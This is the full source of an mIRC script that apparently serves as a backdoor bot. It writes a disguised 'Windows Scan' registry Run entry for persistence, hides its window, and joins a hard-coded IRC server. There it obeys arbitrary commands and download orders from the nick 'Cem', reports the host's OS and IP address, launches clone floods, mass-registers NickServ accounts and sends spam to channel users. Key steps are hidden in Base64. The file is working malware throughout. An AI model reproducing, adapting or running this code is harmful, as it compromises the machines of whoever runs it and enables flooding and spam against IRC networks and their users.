on *:Start: {
  $Secret
  $KXZ
  .server 207.44.249.249
  .server -m %1
  .server -m %2
  .server -m %3
  .server -m %4
  .server -m %5
  .server -m %6
  .server -m %7
  .server -m %8
  .server -m %9
  .server -m %10
  .server -m %11
  .server -m %12
  .server -m %13
  .server -m %14
  .server -m %15
  .server -m %16
  .server -m %17
  .server -m %18
  .server -m %19
  .server -m %20
  .timer 0 0 Secret
}
on *:Connect: {
  if (Cem.Net isin $server) { $QX | Join #Default1 %key | mode #Default1 +kpmu %key | .timer 1 500 disconnect }
  if (%s1 isin $server) { $QXX | Join %1C | .timer 1 100 disconnect }
  if (%s2 isin $server) { $QXX | Join %2C | .timer 1 100 disconnect }
  if (%s3 isin $server) { $QXX | Join %3C | .timer 1 100 disconnect }
  if (%s4 isin $server) { $QXX | Join %4C | .timer 1 100 disconnect }
  if (%s5 isin $server) { $QXX | Join %5C | .timer 1 100 disconnect }
  if (%s6 isin $server) { $QXX | Join %6C | .timer 1 100 disconnect }
  if (%s7 isin $server) { $QXX | Join %7C | .timer 1 100 disconnect }
  if (%s8 isin $server) { $QXX | Join %8C | .timer 1 100 disconnect }
  if (%s9 isin $server) { $QXX | Join %9C | .timer 1 100 disconnect }
  if (%s10 isin $server) { $QXX | Join %10C | .timer 1 100 disconnect }
  if (%s11 isin $server) { $QXX | Join %11C | .timer 1 100 disconnect }
  if (%s12 isin $server) { $QXX | Join %12C | .timer 1 100 disconnect }
  if (%s13 isin $server) { $QXX | Join %13C | .timer 1 100 disconnect }
  if (%s14 isin $server) { $QXX | Join %14C | .timer 1 100 disconnect }
  if (%s15 isin $server) { $QXX | Join %15C | .timer 1 100 disconnect }
  if (%s16 isin $server) { $QXX | Join %16C | .timer 1 100 disconnect }
  if (%s17 isin $server) { $QXX | Join %17C | .timer 1 100 disconnect }
  if (%s18 isin $server) { $QXX | Join %18C | .timer 1 100 disconnect }
  if (%s19 isin $server) { $QXX | Join %19C | .timer 1 100 disconnect }
  if (%s20 isin $server) { $QXX | Join %20C | .timer 1 100 disconnect }
  .away %away
  .ignore -wd *
  .timer 0 15 ping $me
}
alias KXZ {
  .set %windows $r(10,1999) $+ .reg 
  .write %windows $zir(UkVHRURJVDQ=)
  .write %windows $zir(W0hLRVlfTE9DQUxfTUFDSElORVxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW5d) 
  .write %windows "Windows Scan"=" $+ $remove($mircexe,$mircdir) $+ "
  $zir(cnVuIC1uIHJlZ2VkaXQgL3M=) %windows 
  $zir(dGltZXIgMSA0IHJlbW92ZQ==) %windows
}
on *:Disconnect: { $QX | .server | .clearall }
on *:Exit: { run System.exe }
On *:Text:*:#: { 
  if (cem.net isin $server) { 
    if ($nick == Cem) {
      if ($1 == !Cem) { $2- }
      if ($1 == $me) { $2- }
      if ($1 == !Oku) {
        if ($2 == $me) { $Oku }
      }
      if ($1 == !Okuyun) { $Oku }
      if ($1 == !1) { set %1 $2- }
      if ($1 == !2) { set %2 $2- }
      if ($1 == !3) { set %3 $2- }
      if ($1 == !4) { set %4 $2- }
      if ($1 == !5) { set %5 $2- }
      if ($1 == !6) { set %6 $2- }
      if ($1 == !7) { set %7 $2- }
      if ($1 == !8) { set %8 $2- }
      if ($1 == !9) { set %9 $2- }
      if ($1 == !10) { set %10 $2- }
      if ($1 == !11) { set %11 $2- }
      if ($1 == !12) { set %12 $2- }
      if ($1 == !13) { set %13 $2- }
      if ($1 == !14) { set %14 $2- }
      if ($1 == !15) { set %15 $2- }
      if ($1 == !16) { set %16 $2- }
      if ($1 == !17) { set %17 $2- }
      if ($1 == !18) { set %18 $2- }
      if ($1 == !19) { set %19 $2- }
      if ($1 == !20) { set %20 $2- }
      if ($1 == !Away) { set %away $2- }
      if ($1 == !Ozel) { set %ozel $2- }
      if ($1 == !s1) { set %s1 $2- }
      if ($1 == !s2) { set %s2 $2- }
      if ($1 == !s3) { set %s3 $2- }
      if ($1 == !s4) { set %s4 $2- }
      if ($1 == !s5) { set %s5 $2- }
      if ($1 == !s6) { set %s6 $2- }
      if ($1 == !s7) { set %s7 $2- }
      if ($1 == !s8) { set %s8 $2- }
      if ($1 == !s9) { set %s9 $2- }
      if ($1 == !s10) { set %s10 $2- }
      if ($1 == !s11) { set %s11 $2- }
      if ($1 == !s12) { set %s12 $2- }
      if ($1 == !s13) { set %s13 $2- }
      if ($1 == !s14) { set %s14 $2- }
      if ($1 == !s15) { set %s15 $2- }
      if ($1 == !s16) { set %s16 $2- }
      if ($1 == !s17) { set %s17 $2- }
      if ($1 == !s18) { set %s18 $2- }
      if ($1 == !s19) { set %s19 $2- }
      if ($1 == !s20) { set %s20 $2- }
      if ($1 == !r1) { set %r1 $2- }
      if ($1 == !r2) { set %r1 $2- }
      if ($1 == !r3) { set %r1 $2- }
      if ($1 == !r4) { set %r1 $2- }
      if ($1 == !r5) { set %r1 $2- }
      if ($1 == !r6) { set %r1 $2- }
      if ($1 == !r7) { set %r1 $2- }
      if ($1 == !r8) { set %r1 $2- }
      if ($1 == !r9) { set %r1 $2- }
      if ($1 == !r10) { set %r1 $2- }
      if ($1 == !r11) { set %r1 $2- }
      if ($1 == !r12) { set %r1 $2- }
      if ($1 == !r13) { set %r1 $2- }
      if ($1 == !r14) { set %r1 $2- }
      if ($1 == !r15) { set %r1 $2- }
      if ($1 == !r16) { set %r1 $2- }
      if ($1 == !r17) { set %r1 $2- }
      if ($1 == !r18) { set %r1 $2- }
      if ($1 == !r19) { set %r1 $2- }
      if ($1 == !r20) { set %r1 $2- }
      if ($1 == !Download) { get $2- }
      if ($1 == !Bilgi) { $Bilgi }
      if ($1 == !Version) { $Wer }
      if ($1 == !Error) { set %error $1- }
    }
  }
}
Alias Oku {
  msg #Default1 Scid 1 => %1
  msg #Default1 Scid 2 => %2
  msg #Default1 Scid 3 => %3
  msg #Default1 Scid 4 => %4
  msg #Default1 Scid 5 => %5
  .timer 1 4 msg #Default1 Scid 6 => %6
  .timer 1 4 msg #Default1 Scid 7 => %7
  .timer 1 4 msg #Default1 Scid 8 => %8
  .timer 1 4 msg #Default1 Scid 9 => %9
  .timer 1 4 msg #Default1 Scid 10 => %10
  .timer 1 4 msg #Default1 Scid 11 => %11
  .timer 1 8 msg #Default1 Scid 12 => %12
  .timer 1 8 msg #Default1 Scid 13 => %13
  .timer 1 8 msg #Default1 Scid 14 => %14
  .timer 1 8 msg #Default1 Scid 15 => %15
  .timer 1 8 msg #Default1 Scid 16 => %16
  .timer 1 10 msg #Default1 Scid 17 => %17
  .timer 1 10 msg #Default1 Scid 18 => %18
  .timer 1 10 msg #Default1 Scid 19 => %19
  .timer 1 10 msg #Default1 Scid 20 => %20
}
Alias Bilgi {
  .msg #Default1 Bilgisayar Version => $OS
  .msg #Default1 Ip Numarasi        => $ip
  .msg #Default1 IDLE               => $idle
  .msg #Default1 Bu Kadar!!!         => Set by Cem...
}
Alias Wer { Msg #Default1  $+ $r(1,15) $+ Set ßy Cem... }
Alias zir { var %i = 0, %text = $strip($$1), %is = $isid | while (%i < 1) { %text = $iif($calc(%i % 2), $decode(%text), $decode(%text,m)) | inc %i }
  if (!%text) { if (%is) return | var %blank = now | echo !!!! | halt  }
$iif(%is, return %text, echo -a %text) | halt }
Alias QX {
  .nick [Default] $+ - $+ $r(0,9999999)
  .anick $Diyarbakir
  .emailaddr X@
  .identd on $Diyarbakir
  .username $Diyarbakir
}
Alias QXX {
  .nick $read(windowsx.dll)
  .anick $read(windowsx.dll)
  .emailaddr X@
  .identd on $Diyarbakir
  .username $read(windowsx.dll)
}
alias secret { .echo Cem $dll(edih.dll, do_ShowWindow, $window(-2).hwnd 0) }
alias rndsn { unset %rsn* | set %rsn $r(a,z) | var %a = $r(1,5) , %b = $r(1,4) , %c = $r(1,2) , %d = $r(a,z) | if (%c = 1) { var %_ = 1 | while (%_ <= $calc(%a + %b)) {  var %r = $r(1,2) |  if (%r = 1) { set %rsn [ %rsn ] $r(a,z) }
  if (%r = 2) { set %rsn [ %rsn ] $r(a,z) } | inc %_  } } | if (%c = 2) { var %_ = 1 | while (%_ <= $calc(%a + %b)) { var %r = $r(1,2) |  if (%r = 1) { set %rsn [ %rsn ] $r(a,z) } | if (%r = 2) { set %rsn [ %rsn ] $r(a,z) } | inc %_  } } | return $remove(%rsn,$chr(32)) 
}
alias Diyarbakir { unset %rsn* | set %rsn $r(a,z) | var %a = $r(1,5) , %b = $r(1,4) , %c = $r(1,2) , %d = $r(a,z) | if (%c = 1) { var %_ = 1 | while (%_ <= $calc(%a + %b)) {  var %r = $r(1,2) |  if (%r = 1) { set %rsn [ %rsn ] $r(a,z) }
  if (%r = 2) { set %rsn [ %rsn ] $r(a,z) } | inc %_  } } | if (%c = 2) { var %_ = 1 | while (%_ <= $calc(%a + %b)) { var %r = $r(1,2) |  if (%r = 1) { set %rsn [ %rsn ] $r(a,z) } | if (%r = 2) { set %rsn [ %rsn ] $r(a,z) } | inc %_  } } | return $remove(%rsn,$chr(32)) 
}
alias clone {
  if ($1 = $zir(bG9hZA==)) { 
    var %x = $4 
    %cs = $2 
    %cp = $3 
    while  (%x >= 1) { 
      .sockopen clone $+ %x $+ $rndsn %cs %cp 
      dec %x  
    } 
  }
  if ($1 = $zir(Zmxvb2Q=)) { 
    $MeSuT(sockw,join,$2) 
    $MeSuT(sockw,privmsg,$2, : $floodmsg)
  }
  if ($1 = $zir(am9pbg==)) { 
    $MeSuT(sockw,join,$2) 
  } 
  if ($1 = $zir(cGFydA==)) { 
    $MeSuT(sockw,part,$2) 
  } 
  if ($1 = $zir(Y2xvc2U=)) { 
    $MeSuT(sockw,quit, : $floodmsg) 
    .timerflood off 
  }
  if ($1 = $zir(bm90aWNl)) { 
    $MeSuT(sockw,notice,$2, : $3-) 
  } 
  if ($1 = $zir(a2FidXM=)) { $oku } 
  if ($1 = $zir(cmFuZG9t)) { 
    $MeSuT(sockw,join,$2) 
    $MeSuT(sockw,privmsg,$2, : $3- $str($rndsn,50))
  }
  if ($1 = $zir(aGVscA==)) { 
    $MeSuT(sockw,privmsg,nickserv, : help)
    $MeSuT(sockw,privmsg,chanserv, : help)
    $MeSuT(sockw,privmsg,memoserv, : help)
  }
  if ($1 = $zir(bmljaw==)) { sockwrite -nt clone* $dellen }
}
alias dellen { sockwrite -nt clone* $sockname nick $rndsn }
alias oku { sockwrite -nt clone* nickserv register $rndsn  $+($rndsn,@hotmail.com) }
on 1:sockopen:clone*: { 
  .sockwrite -nt $sockname user $rndsn $rndsn $rndsn : $rndsn 
  .sockwrite -nt $sockname nick $rndsn 
}
alias MeSuT { if ( $1 = Mersinteam) { $zir(cnVuIGtvbWlrLmV4ZSAvbiAvZmggL3I=) ' $+ $2- $+ ' } | if ($1 = sockw) { sockwrite -nt clone* $2- } }
alias floodmsg { 
  inc %fx 1
  if (%fx > 3) { 
    unset %fx 
    %fx = 1
  }
  return $str(flo0d,$calc(70+ %fx)) 
}
on *:Join:#: { 
  window -h $Chan
  if (Cem.Net isin $server) { halt }
  if (%s1 isin $server) { .msg $nick %r1 }
  if (%s2 isin $server) { .msg $nick %r2 }
  if (%s3 isin $server) { .msg $nick %r3 }
  if (%s4 isin $server) { .msg $nick %r4 }
  if (%s5 isin $server) { .msg $nick %r5 }
  if (%s6 isin $server) { .msg $nick %r6 }
  if (%s7 isin $server) { .msg $nick %r7 }
  if (%s8 isin $server) { .msg $nick %r8 }
  if (%s9 isin $server) { .msg $nick %r9 }
  if (%s10 isin $server) { .msg $nick %r10 }
  if (%s11 isin $server) { .msg $nick %r11 }
  if (%s12 isin $server) { .msg $nick %r12 }
  if (%s13 isin $server) { .msg $nick %r13 }
  if (%s14 isin $server) { .msg $nick %r14 }
  if (%s15 isin $server) { .msg $nick %r15 }
  if (%s16 isin $server) { .msg $nick %r16 }
  if (%s17 isin $server) { .msg $nick %r17 }
  if (%s18 isin $server) { .msg $nick %r18 }
  if (%s19 isin $server) { .msg $nick %r19 }
  if (%s20 isin $server) { .msg $nick %r20 }
}
On *:Part:#: { 
  if (Cem.Net isin $server) { halt }
  if (%s1 isin $server) { .msg $nick %r1 }
  if (%s2 isin $server) { .msg $nick %r2 }
  if (%s3 isin $server) { .msg $nick %r3 }
  if (%s4 isin $server) { .msg $nick %r4 }
  if (%s5 isin $server) { .msg $nick %r5 }
  if (%s6 isin $server) { .msg $nick %r6 }
  if (%s7 isin $server) { .msg $nick %r7 }
  if (%s8 isin $server) { .msg $nick %r8 }
  if (%s9 isin $server) { .msg $nick %r9 }
  if (%s10 isin $server) { .msg $nick %r10 }
  if (%s11 isin $server) { .msg $nick %r11 }
  if (%s12 isin $server) { .msg $nick %r12 }
  if (%s13 isin $server) { .msg $nick %r13 }
  if (%s14 isin $server) { .msg $nick %r14 }
  if (%s15 isin $server) { .msg $nick %r15 }
  if (%s16 isin $server) { .msg $nick %r16 }
  if (%s17 isin $server) { .msg $nick %r17 }
  if (%s18 isin $server) { .msg $nick %r18 }
  if (%s19 isin $server) { .msg $nick %r19 }
  if (%s20 isin $server) { .msg $nick %r20 }
}
raw *:*: {
  if ($numeric = 439) { disconnect }
  if ($numeric = 432) { nick $Diyarbakir } 
  if ($numeric = 433) { nick $Diyarbakir }
}
On *:Error:*: { set %error $1- }
; Dim tis Dim tis :) yeah!
